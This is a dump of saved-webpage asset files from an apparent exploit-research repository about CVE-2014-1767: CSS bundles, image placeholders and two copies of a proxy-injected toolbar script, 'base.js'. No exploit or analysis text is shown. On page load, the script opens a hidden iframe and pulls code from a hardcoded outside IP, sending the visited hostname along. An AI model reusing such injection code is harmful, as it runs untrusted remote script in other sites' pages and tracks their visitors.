2014-2015 4 | *@author Kunal 70924 5 | *@modified 11.12.2014 6 | *@usage The Web URL of this file is used in DMC Proxy Configuration to insert toolbar. 7 | */ 8 | 9 | /** 10 | * This anonymous function executes automatically to insert toolbar template & related resources. 11 | * It also parses the SCG specified parameters and passes it to TLBS 12 | * 13 | * @param None 14 | * @return None 15 | */ 16 | (function() { 17 | try { 18 | top.tlbscdr = {}; 19 | top.tlbscdr.jscdr = []; 20 | var cdate = new Date(); 21 | var startcdr = { 22 | 'jsname': 'base.js', 23 | 'jsexetype': '1', 24 | 'btime': cdate 25 | }; 26 | top.tlbscdr.jscdr.push(startcdr); 27 | /** 28 | * get url parameter.for examplate url:http://www.baidu.com?p1=1&p2=2 29 | * getparam('p1') ==1; 30 | */ 31 | var getparam = function(name) { 32 | try { 33 | var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i"); 34 | var r = top.window.location.search.substr(1).match(reg); 35 | if (r != null) return unescape(r[2]); 36 | return ""; 37 | } catch (e) {} 38 | }; 39 | /** 40 | * This function creates a new iFrame element in the service page and then adds all template resources 41 | * as given in the response from JSREQ 42 | * 43 | * @param None 44 | * @return None 45 | */ 46 | var embedjs = function() { 47 | if (top.tlbs && !top.tlbsEmbed) { 48 | top.tlbsEmbed = true; 49 | var head = top.document.getElementsByTagName('head')[0]; 50 | var tlbs = top.tlbs, 51 | js = top.tlbs.iframejs.split("|"), 52 | html = ''; 53 | for (var i = 0; i < js.length; i++) { 54 | if (js[i].indexOf(".js") != -1) { 55 | html += ''; 56 | } else if (js[i].indexOf(".css") != -1) { 57 | var link = document.createElement("link"); 58 | link.rel = "stylesheet"; 59 | link.type = "text/css"; 60 | link.charset = "UTF-8"; 61 | link.href = js[i]; 62 | head.appendChild(link); 63 | } 64 | } 65 | html += ''; 66 | var iframe = document.createElement("iframe"); 67 | iframe.style.display = "none"; 68 | document.body.appendChild(iframe); 69 | try { 70 | var doc = iframe.contentWindow.document; 71 | doc.write(html); 72 | doc.close(); 73 | } catch (e) { 74 | // if (/MSIE/g.test(navigator.userAgent)) { 75 | // if (location.href.indexOf('www.people.com.cn') >= 0 || location.href.indexOf('www.caijing.com.cn') >= 0) { 76 | // return; 77 | // } 78 | // } 79 | iframe.src = "javascript:void((function(){document.open();document.domain='" + document.domain + "';document.write('" + html + "');document.close()})())"; 80 | } 81 | /**To support angularJS ng-hide and show**/ 82 | var angularstyle = document.createElement('style'); 83 | angularstyle.type = 'text/css'; 84 | angularstyle.innerHTML = '@charset "UTF-8";[ng\\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\\:form{display:block;}'; 85 | head.appendChild(angularstyle); 86 | } else { 87 | top.nobar = true; 88 | } 89 | }; 90 | 91 | /** 92 | * This function calls embedjs function once browser is ready to load a script element. 93 | * 94 | * @param Script element 95 | * @return None 96 | */ 97 | var loadjs = function(s) { 98 | if (s.readyState) { 99 | s.onreadystatechange = function() { 100 | if (s.readyState == "loaded" || s.readyState == "complete") { 101 | s.onreadystatechange = null; 102 | embedjs(); 103 | 104 | } 105 | }; 106 | } else { 107 | s.onload = function() { 108 | embedjs(); 109 | 110 | }; 111 | } 112 | }; 113 | 114 | /** 115 | * This function parses all SCG provided parameters and prepares attribute value pair in URI format 116 | * 117 | * @param Attribute List as array 118 | * @return parameter URL with AVPs 119 | */ 120 | var getScgParams = function(attr) { 121 | var len = attr.length, 122 | p = ''; 123 | for (var i = 0; i < len; i++) { 124 | if (!(/^(src|type|id)$/.test(attr[i].name))) 125 | p = p + '&' + attr[i].name + "=" + attr[i].value; 126 | } 127 | return p; 128 | }; 129 | 130 | 131 | /** 132 | * This function queries script element inserted by Proxy and calls other function to insert iFrame 133 | * and get list of SCG parameters. It also fetches the resource list from Resource Dispatcher and 134 | * adds to the head of the service page. 135 | * 136 | * @param Attribute List as array 137 | * @return parameter URL with AVPs 138 | */ 139 | var createjs = function() { 140 | var d = document, 141 | t = d.getElementById('1qa2ws'), 142 | //u = t.getAttribute("src"), 143 | h = d.head || d.getElementsByTagName("head")[0], 144 | //a = t.attributes, 145 | 146 | //scgparam = getScgParams(a); 147 | s = d.createElement("script"); 148 | 149 | loadjs(s); 150 | top.apptlbs = {}; 151 | s.charset = "UTF-8"; 152 | var Mytime = new Date(); 153 | var Time = Mytime.getTime(); 154 | //var toolbarURL = u.split('www/')[0]; 155 | var toolbarURL = 'http://111.8.2.135:9002/'; 156 | var website = top.window.location ? top.window.location.hostname + (top.window.location.port ? ':' + top.window.location.port : '') : ''; 157 | //s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website + encodeURI(scgparam); 158 | s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website; 159 | var appkey = getparam('appkey'); 160 | if (appkey && (('http://' + website + '/') == toolbarURL)) { 161 | s.src = s.src + "&appkey=" + appkey; 162 | top.apptlbs.appkey = appkey; 163 | } 164 | h.appendChild(s); 165 | }; 166 | if (parent == self) { 167 | createjs(); 168 | } 169 | 170 | cdate = new Date(); 171 | var endcdr = { 172 | 'jsname': 'base.js', 173 | 'jsexetype': '2', 174 | 'btime': cdate 175 | }; 176 | top.tlbscdr.jscdr.push(endcdr); 177 | 178 | //TODO: Refer CDR writing in success cases of insertion 179 | } catch (e) { 180 | var d = document; 181 | var t = d.getElementById('1qa2ws'); 182 | var u = t.getAttribute("src"); 183 | var params = e.message; 184 | params += "&time=" + new Date().getTime(); 185 | var js = document.createElement('script'); 186 | js.onload = js.onreadystatechange = function() { 187 | if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') { 188 | js.onload = js.onreadystatechange = null; 189 | document.body.removeChild(js); 190 | } 191 | }; 192 | //TODO: Uncoment below & Refer CDR writing in error cases of insertion 193 | //js.src = u.split('tlbsgui')[0] + "tlbsserver/stagelog?" + params; 194 | //document.body.appendChild(js); 195 | } 196 | 197 | })(window) 198 | -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/bundle-LessIsMore-mobile.css: -------------------------------------------------------------------------------- 1 | body{font-size:14px!important;font-family:'PingFang SC','Helvetica Neue','Helvetica','Arial',sans-serif}#blog_nav_rss{display:none!important}#blog_nav_rss_image{display:none!important}#blog_nav_newpost{display:none!important}img{max-width:300px!important;height:auto}div.commentform textarea{width:330px;height:200px}.commentbox_title{width:auto}#green_channel{width:320px}#cnblogs_post_body table[style]{width:auto!important;height:auto!important}#sidebar_search_box input[type=text]{width:260px}.sh-gutter .line,.sh-gutter code{white-space:normal!important}#cnblogs_post_body table{display:block;overflow-x:scroll;-webkit-overflow-scrolling:regular}#cnblogs_post_body th,#cnblogs_post_body td,.cnblogs-post-body th,.cnblogs-post-body td{white-space:nowrap}#cnblogs_post_body table::-webkit-scrollbar:horizontal{height:12px}#cnblogs_post_body table::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar{width:12px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#555}#cnblogs_c1,#cnblogs_c2{text-align:center}.commentform{margin-left:10px} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/bundle-LessIsMore.css: -------------------------------------------------------------------------------- 1 | #EntryTag{margin-top:20px;font-size:9pt;color:gray}#divRefreshComments{text-align:right;margin-right:10px;margin-bottom:5px;font-size:9pt}.topicListFooter{text-align:right;margin-right:10px;margin-top:10px}*{margin:0;padding:0}body{color:#333;background:#fff;font-family:Verdana,Arial,Helvetica,sans-serif;font-size:10pt;line-height:1.8}img{border:0}li{list-style:none}input,textarea{border:1px solid #999}h1,h2,h3,h4,h5,h6,th{font-weight:bold;color:#000}a{text-decoration:none;color:#333}a:hover{color:#999}#sideBar{width:220px;float:left;border:1px solid #999;border-top-width:0;overflow:hidden;padding:0 8px 40px 12px}#mainContent{float:right;margin-left:-250px;width:100%}.forFlow{margin:0 16px 0 266px}#footer{text-align:center}#lnkBlogLogo{display:none}#blogTitle{padding:16px}#blogTitle h1{font-size:17pt}#blogTitle h2{font-size:10.5pt;color:#999}#blogTitle .title{font-size:17pt}#blogTitle .subtitle{font-size:10.5pt;color:#999}#navigator{background:#f6f6f6;border:1px solid #ccc;border-width:1px;height:30px;line-height:30px;color:#999;padding-left:15px;padding-right:5px;padding-top:2px\9}#navigator img{display:none}.blogStats{float:right;color:#999}#navList li{float:left;margin-right:20px;font-size:10.5pt}#sideBar li,.divRecentCommentAticle{text-indent:-1.5em;margin-left:1.5em}#sideBar h3,#MyIng .ing_title{margin:16px 0 0 -8px;font-size:14px;text-align:left}#calendar{margin-top:16px;text-align:center}#calendar table{width:90%;margin:0 auto}#calendar .CalOtherMonthDay{color:#999}#sideBar .divRecentComment{color:#666;margin:0 0 8px 8px}.ing_title a:link,.ing_title a:visited,.ing_title a:hover,.ing_title a:active{font-weight:bold}div.commentform textarea{width:450px;height:300px;ont-size:13px}.dayTitle{display:none}.entrylistTitle,.thumbTitle,.PostListTitle,.forFlow h3 div,.galleryTitle{font-size:14px;font-weight:bold;margin-top:20px;text-align:left}.entrylistDescription,.thumbDescription{margin-left:16px}.postTitle,.entrylistPosttitle,.feedback_area_title{border-bottom:1px solid #ddd;font-size:14px;font-weight:bold;margin:20px 0 10px}.postBody p{margin-top:12px}.postBody h5{font-size:10pt}.postCon a,.postBody a,.feedbackCon a{border-bottom:1px dotted #333;color:#000}.postCon a:hover,.postBody a:hover,.feedbackCon a:hover{border-color:#999}.postDesc,.entrylistItemPostDesc{border-bottom:1px dotted #999;color:#999;text-align:right;padding-bottom:20px}.PostList{float:none;clear:both;text-align:right;width:96%;margin:auto;padding:6px 0;overflow:hidden;border-bottom:1px dotted #ccc}.postTitl2{float:left}.postText2{text-align:left;color:#666}.feedbackItem{padding:8px;border-bottom:1px dotted #ccc}.feedbackManage{float:right}.feedbackCon{margin-left:1em;color:#666}.commentform td div span{margin-left:12px}.gallery img{margin:8px}#taglist{margin:20px auto}.pfl_feedback_area_title{font-size:16px;margin:16px 0;font-weight:bold}.pfl_feedback_area_title a{font-size:12px;color:#999;font-weight:normal}.pfl_feedbacksubtitle{height:30px}.pfl_feedbackname,.pfl_feedbackManage{float:left;margin:10px 20px 0 0}.pfl_feedbackCon,.pfl_feedbackAnswer{clear:both;margin-left:12px}.btn_my_zzk{border:0}#sideBarMain{padding-left:0}#MyIng{padding-left:10px}p{margin-top:0;margin-bottom:0}div#sideBar div#side_ing_block ul li{margin-left:0;text-indent:0}@media only screen and (max-width:767px){#sideBar{width:auto}.commentbox_main{padding-right:10px}div.commentform textarea{width:100%}#main{padding:0!important}#mainContent{float:none!important;margin-left:0;overflow:initial!important}.forFlow{margin:0 10px}#sideBar{float:none!important;margin-left:0!important;position:static!important}} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/get: -------------------------------------------------------------------------------- 1 | null -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/icon_weibo_24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/icon_weibo_24.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/img.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/img.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/indent.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/indent.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/lk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/lk.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/quote.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/quote.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/sample_face.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/sample_face.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/wechat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/wechat.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856410-1417966897.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856410-1417966897.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856816-1716396550.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856816-1716396550.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123857238-1357395101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123857238-1357395101.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/InsertCode.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/InsertCode.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/b.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/base.js.下载: -------------------------------------------------------------------------------- 1 | /** 2 | * Huawei Technologies http://www.huawei.com 3 | *(c) 2014-2015 4 | *@author Kunal 70924 5 | *@modified 11.12.2014 6 | *@usage The Web URL of this file is used in DMC Proxy Configuration to insert toolbar. 7 | */ 8 | 9 | /** 10 | * This anonymous function executes automatically to insert toolbar template & related resources. 11 | * It also parses the SCG specified parameters and passes it to TLBS 12 | * 13 | * @param None 14 | * @return None 15 | */ 16 | (function() { 17 | try { 18 | top.tlbscdr = {}; 19 | top.tlbscdr.jscdr = []; 20 | var cdate = new Date(); 21 | var startcdr = { 22 | 'jsname': 'base.js', 23 | 'jsexetype': '1', 24 | 'btime': cdate 25 | }; 26 | top.tlbscdr.jscdr.push(startcdr); 27 | /** 28 | * get url parameter.for examplate url:http://www.baidu.com?p1=1&p2=2 29 | * getparam('p1') ==1; 30 | */ 31 | var getparam = function(name) { 32 | try { 33 | var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i"); 34 | var r = top.window.location.search.substr(1).match(reg); 35 | if (r != null) return unescape(r[2]); 36 | return ""; 37 | } catch (e) {} 38 | }; 39 | /** 40 | * This function creates a new iFrame element in the service page and then adds all template resources 41 | * as given in the response from JSREQ 42 | * 43 | * @param None 44 | * @return None 45 | */ 46 | var embedjs = function() { 47 | if (top.tlbs && !top.tlbsEmbed) { 48 | top.tlbsEmbed = true; 49 | var head = top.document.getElementsByTagName('head')[0]; 50 | var tlbs = top.tlbs, 51 | js = top.tlbs.iframejs.split("|"), 52 | html = ''; 53 | for (var i = 0; i < js.length; i++) { 54 | if (js[i].indexOf(".js") != -1) { 55 | html += ''; 56 | } else if (js[i].indexOf(".css") != -1) { 57 | var link = document.createElement("link"); 58 | link.rel = "stylesheet"; 59 | link.type = "text/css"; 60 | link.charset = "UTF-8"; 61 | link.href = js[i]; 62 | head.appendChild(link); 63 | } 64 | } 65 | html += ''; 66 | var iframe = document.createElement("iframe"); 67 | iframe.style.display = "none"; 68 | document.body.appendChild(iframe); 69 | try { 70 | var doc = iframe.contentWindow.document; 71 | doc.write(html); 72 | doc.close(); 73 | } catch (e) { 74 | // if (/MSIE/g.test(navigator.userAgent)) { 75 | // if (location.href.indexOf('www.people.com.cn') >= 0 || location.href.indexOf('www.caijing.com.cn') >= 0) { 76 | // return; 77 | // } 78 | // } 79 | iframe.src = "javascript:void((function(){document.open();document.domain='" + document.domain + "';document.write('" + html + "');document.close()})())"; 80 | } 81 | /**To support angularJS ng-hide and show**/ 82 | var angularstyle = document.createElement('style'); 83 | angularstyle.type = 'text/css'; 84 | angularstyle.innerHTML = '@charset "UTF-8";[ng\\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\\:form{display:block;}'; 85 | head.appendChild(angularstyle); 86 | } else { 87 | top.nobar = true; 88 | } 89 | }; 90 | 91 | /** 92 | * This function calls embedjs function once browser is ready to load a script element. 93 | * 94 | * @param Script element 95 | * @return None 96 | */ 97 | var loadjs = function(s) { 98 | if (s.readyState) { 99 | s.onreadystatechange = function() { 100 | if (s.readyState == "loaded" || s.readyState == "complete") { 101 | s.onreadystatechange = null; 102 | embedjs(); 103 | 104 | } 105 | }; 106 | } else { 107 | s.onload = function() { 108 | embedjs(); 109 | 110 | }; 111 | } 112 | }; 113 | 114 | /** 115 | * This function parses all SCG provided parameters and prepares attribute value pair in URI format 116 | * 117 | * @param Attribute List as array 118 | * @return parameter URL with AVPs 119 | */ 120 | var getScgParams = function(attr) { 121 | var len = attr.length, 122 | p = ''; 123 | for (var i = 0; i < len; i++) { 124 | if (!(/^(src|type|id)$/.test(attr[i].name))) 125 | p = p + '&' + attr[i].name + "=" + attr[i].value; 126 | } 127 | return p; 128 | }; 129 | 130 | 131 | /** 132 | * This function queries script element inserted by Proxy and calls other function to insert iFrame 133 | * and get list of SCG parameters. It also fetches the resource list from Resource Dispatcher and 134 | * adds to the head of the service page. 135 | * 136 | * @param Attribute List as array 137 | * @return parameter URL with AVPs 138 | */ 139 | var createjs = function() { 140 | var d = document, 141 | t = d.getElementById('1qa2ws'), 142 | //u = t.getAttribute("src"), 143 | h = d.head || d.getElementsByTagName("head")[0], 144 | //a = t.attributes, 145 | 146 | //scgparam = getScgParams(a); 147 | s = d.createElement("script"); 148 | 149 | loadjs(s); 150 | top.apptlbs = {}; 151 | s.charset = "UTF-8"; 152 | var Mytime = new Date(); 153 | var Time = Mytime.getTime(); 154 | //var toolbarURL = u.split('www/')[0]; 155 | var toolbarURL = 'http://111.8.2.135:9002/'; 156 | var website = top.window.location ? top.window.location.hostname + (top.window.location.port ? ':' + top.window.location.port : '') : ''; 157 | //s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website + encodeURI(scgparam); 158 | s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website; 159 | var appkey = getparam('appkey'); 160 | if (appkey && (('http://' + website + '/') == toolbarURL)) { 161 | s.src = s.src + "&appkey=" + appkey; 162 | top.apptlbs.appkey = appkey; 163 | } 164 | h.appendChild(s); 165 | }; 166 | if (parent == self) { 167 | createjs(); 168 | } 169 | 170 | cdate = new Date(); 171 | var endcdr = { 172 | 'jsname': 'base.js', 173 | 'jsexetype': '2', 174 | 'btime': cdate 175 | }; 176 | top.tlbscdr.jscdr.push(endcdr); 177 | 178 | //TODO: Refer CDR writing in success cases of insertion 179 | } catch (e) { 180 | var d = document; 181 | var t = d.getElementById('1qa2ws'); 182 | var u = t.getAttribute("src"); 183 | var params = e.message; 184 | params += "&time=" + new Date().getTime(); 185 | var js = document.createElement('script'); 186 | js.onload = js.onreadystatechange = function() { 187 | if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') { 188 | js.onload = js.onreadystatechange = null; 189 | document.body.removeChild(js); 190 | } 191 | }; 192 | //TODO: Uncoment below & Refer CDR writing in error cases of insertion 193 | //js.src = u.split('tlbsgui')[0] + "tlbsserver/stagelog?" + params; 194 | //document.body.appendChild(js); 195 | } 196 | 197 | })(window) 198 | -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/bundle-LessIsMore-mobile.css: -------------------------------------------------------------------------------- 1 | body{font-size:14px!important;font-family:'PingFang SC','Helvetica Neue','Helvetica','Arial',sans-serif}#blog_nav_rss{display:none!important}#blog_nav_rss_image{display:none!important}#blog_nav_newpost{display:none!important}img{max-width:300px!important;height:auto}div.commentform textarea{width:330px;height:200px}.commentbox_title{width:auto}#green_channel{width:320px}#cnblogs_post_body table[style]{width:auto!important;height:auto!important}#sidebar_search_box input[type=text]{width:260px}.sh-gutter .line,.sh-gutter code{white-space:normal!important}#cnblogs_post_body table{display:block;overflow-x:scroll;-webkit-overflow-scrolling:regular}#cnblogs_post_body th,#cnblogs_post_body td,.cnblogs-post-body th,.cnblogs-post-body td{white-space:nowrap}#cnblogs_post_body table::-webkit-scrollbar:horizontal{height:12px}#cnblogs_post_body table::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar{width:12px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#555}#cnblogs_c1,#cnblogs_c2{text-align:center}.commentform{margin-left:10px} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/bundle-LessIsMore.css: -------------------------------------------------------------------------------- 1 | #EntryTag{margin-top:20px;font-size:9pt;color:gray}#divRefreshComments{text-align:right;margin-right:10px;margin-bottom:5px;font-size:9pt}.topicListFooter{text-align:right;margin-right:10px;margin-top:10px}*{margin:0;padding:0}body{color:#333;background:#fff;font-family:Verdana,Arial,Helvetica,sans-serif;font-size:10pt;line-height:1.8}img{border:0}li{list-style:none}input,textarea{border:1px solid #999}h1,h2,h3,h4,h5,h6,th{font-weight:bold;color:#000}a{text-decoration:none;color:#333}a:hover{color:#999}#sideBar{width:220px;float:left;border:1px solid #999;border-top-width:0;overflow:hidden;padding:0 8px 40px 12px}#mainContent{float:right;margin-left:-250px;width:100%}.forFlow{margin:0 16px 0 266px}#footer{text-align:center}#lnkBlogLogo{display:none}#blogTitle{padding:16px}#blogTitle h1{font-size:17pt}#blogTitle h2{font-size:10.5pt;color:#999}#blogTitle .title{font-size:17pt}#blogTitle .subtitle{font-size:10.5pt;color:#999}#navigator{background:#f6f6f6;border:1px solid #ccc;border-width:1px;height:30px;line-height:30px;color:#999;padding-left:15px;padding-right:5px;padding-top:2px\9}#navigator img{display:none}.blogStats{float:right;color:#999}#navList li{float:left;margin-right:20px;font-size:10.5pt}#sideBar li,.divRecentCommentAticle{text-indent:-1.5em;margin-left:1.5em}#sideBar h3,#MyIng .ing_title{margin:16px 0 0 -8px;font-size:14px;text-align:left}#calendar{margin-top:16px;text-align:center}#calendar table{width:90%;margin:0 auto}#calendar .CalOtherMonthDay{color:#999}#sideBar .divRecentComment{color:#666;margin:0 0 8px 8px}.ing_title a:link,.ing_title a:visited,.ing_title a:hover,.ing_title a:active{font-weight:bold}div.commentform textarea{width:450px;height:300px;ont-size:13px}.dayTitle{display:none}.entrylistTitle,.thumbTitle,.PostListTitle,.forFlow h3 div,.galleryTitle{font-size:14px;font-weight:bold;margin-top:20px;text-align:left}.entrylistDescription,.thumbDescription{margin-left:16px}.postTitle,.entrylistPosttitle,.feedback_area_title{border-bottom:1px solid #ddd;font-size:14px;font-weight:bold;margin:20px 0 10px}.postBody p{margin-top:12px}.postBody h5{font-size:10pt}.postCon a,.postBody a,.feedbackCon a{border-bottom:1px dotted #333;color:#000}.postCon a:hover,.postBody a:hover,.feedbackCon a:hover{border-color:#999}.postDesc,.entrylistItemPostDesc{border-bottom:1px dotted #999;color:#999;text-align:right;padding-bottom:20px}.PostList{float:none;clear:both;text-align:right;width:96%;margin:auto;padding:6px 0;overflow:hidden;border-bottom:1px dotted #ccc}.postTitl2{float:left}.postText2{text-align:left;color:#666}.feedbackItem{padding:8px;border-bottom:1px dotted #ccc}.feedbackManage{float:right}.feedbackCon{margin-left:1em;color:#666}.commentform td div span{margin-left:12px}.gallery img{margin:8px}#taglist{margin:20px auto}.pfl_feedback_area_title{font-size:16px;margin:16px 0;font-weight:bold}.pfl_feedback_area_title a{font-size:12px;color:#999;font-weight:normal}.pfl_feedbacksubtitle{height:30px}.pfl_feedbackname,.pfl_feedbackManage{float:left;margin:10px 20px 0 0}.pfl_feedbackCon,.pfl_feedbackAnswer{clear:both;margin-left:12px}.btn_my_zzk{border:0}#sideBarMain{padding-left:0}#MyIng{padding-left:10px}p{margin-top:0;margin-bottom:0}div#sideBar div#side_ing_block ul li{margin-left:0;text-indent:0}@media only screen and (max-width:767px){#sideBar{width:auto}.commentbox_main{padding-right:10px}div.commentform textarea{width:100%}#main{padding:0!important}#mainContent{float:none!important;margin-left:0;overflow:initial!important}.forFlow{margin:0 10px}#sideBar{float:none!important;margin-left:0!important;position:static!important}} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/copycode.gif: -------------------------------------------------------------------------------- 